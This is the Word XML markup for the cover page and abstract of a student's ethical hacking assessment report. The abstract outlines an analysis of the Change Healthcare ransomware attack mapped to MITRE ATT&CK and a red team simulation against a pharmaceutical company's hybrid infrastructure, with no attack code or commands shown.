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44AA1" w:rsidRPr="00C57BFC" w:rsidRDefault="00644AA1" w:rsidP="00644AA1">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc212070078"/>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:kern w:val="36"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7AB06983" wp14:editId="5CCCB70E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1267460</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>537845</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3724910" cy="1235710"/>
            <wp:effectExtent l="0" t="0" r="8890" b="2540"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="13320"/>
                <wp:lineTo x="331" y="19979"/>
                <wp:lineTo x="2651" y="21311"/>
                <wp:lineTo x="8837" y="21311"/>
                <wp:lineTo x="9500" y="21311"/>
                <wp:lineTo x="17012" y="21311"/>
                <wp:lineTo x="21541" y="19313"/>
                <wp:lineTo x="21541" y="11322"/>
                <wp:lineTo x="5413" y="10656"/>
                <wp:lineTo x="18669" y="9324"/>
                <wp:lineTo x="18890" y="5994"/>
                <wp:lineTo x="19442" y="4329"/>
                <wp:lineTo x="19442" y="666"/>
                <wp:lineTo x="1491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ow-black-e1530720485783.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3724910" cy="1235710"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00644AA1" w:rsidRPr="00C57BFC" w:rsidRDefault="00644AA1" w:rsidP="00644AA1">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00644AA1" w:rsidRPr="00C57BFC" w:rsidRDefault="00644AA1" w:rsidP="00644AA1">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0007433F" w:rsidRPr="00C57BFC" w:rsidRDefault="0007433F" w:rsidP="00644AA1">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00644AA1" w:rsidRPr="00C57BFC" w:rsidRDefault="00644AA1" w:rsidP="00644AA1">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>ETHICAL HACKING</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00644AA1" w:rsidRPr="00C57BFC" w:rsidRDefault="00644AA1" w:rsidP="00644AA1">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00644AA1" w:rsidRPr="00C57BFC" w:rsidRDefault="00644AA1" w:rsidP="00644AA1">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc212070080"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>ACCA7033 Assessment Report</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w:rsidR="00644AA1" w:rsidRPr="00C57BFC" w:rsidRDefault="00644AA1" w:rsidP="00644AA1">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00644AA1" w:rsidRPr="00C57BFC" w:rsidRDefault="00644AA1" w:rsidP="00644AA1">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Student Name:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Habibullah</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Shaikh</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Student ID:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00C57BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="100E25"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="23"/>
          </w:rPr>
          <w:t>2503799</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Programme</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>MSc Cybersecurity and Digital Forensics</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Submission Date:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>Wednesday, 17th December 2025</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B747B" w:rsidRPr="00C57BFC" w:rsidRDefault="006B747B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00644AA1" w:rsidRPr="00C57BFC" w:rsidRDefault="00644AA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00644AA1" w:rsidRPr="00C57BFC" w:rsidRDefault="00644AA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00644AA1" w:rsidRPr="00C57BFC" w:rsidRDefault="00644AA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00644AA1" w:rsidRPr="00C57BFC" w:rsidRDefault="00644AA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00644AA1" w:rsidRPr="00C57BFC" w:rsidRDefault="00644AA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00644AA1" w:rsidRPr="00C57BFC" w:rsidRDefault="00644AA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00644AA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00644AA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00644AA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00644AA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00644AA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00644AA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00644AA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00644AA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00644AA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00644AA1" w:rsidRPr="00C57BFC" w:rsidRDefault="00644AA1" w:rsidP="00644AA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ABSTRACT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0003161B" w:rsidRPr="00C57BFC" w:rsidRDefault="00041909" w:rsidP="00644AA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">In this report I am going to analysis Change Healthcare ransomware attack which began on February 21, 2024, This was largest healthcare data breach in the US history, </w:t>
      </w:r>
      <w:r w:rsidR="00245CD8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> this attack around 192.7 million people data leaked. This attack was carried out by ALPHV/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BlackCat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> group. This report maps the Tactics, Techniques and Procedures (TTPs) of attackers with MITRE ATT&amp;CK framework, found out that </w:t>
      </w:r>
      <w:r w:rsidR="0003161B" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>multi-factor authentication(MFA) was not enabled on remote access systems that’s why hackers easily attacked the industry.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00041909" w:rsidRPr="00C57BFC" w:rsidRDefault="0003161B" w:rsidP="00644AA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In Second part, Operation IP Shield explains Red Team simulation which conducted on pharmaceutical company’s hybrid infrastructure (AWS cloud, on-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>prem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Active Directory and CI/CD pipeline).</w:t>
      </w:r>
      <w:r w:rsidR="00245CD8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This assessment simulate </w:t>
      </w:r>
      <w:r w:rsidR="00245CD8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>realistic cyberattacks, identification of detection and defense weakness, and give strategic recommendations through which organization improves it cyber security and business resilience.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00644AA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00644AA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00644AA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00644AA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
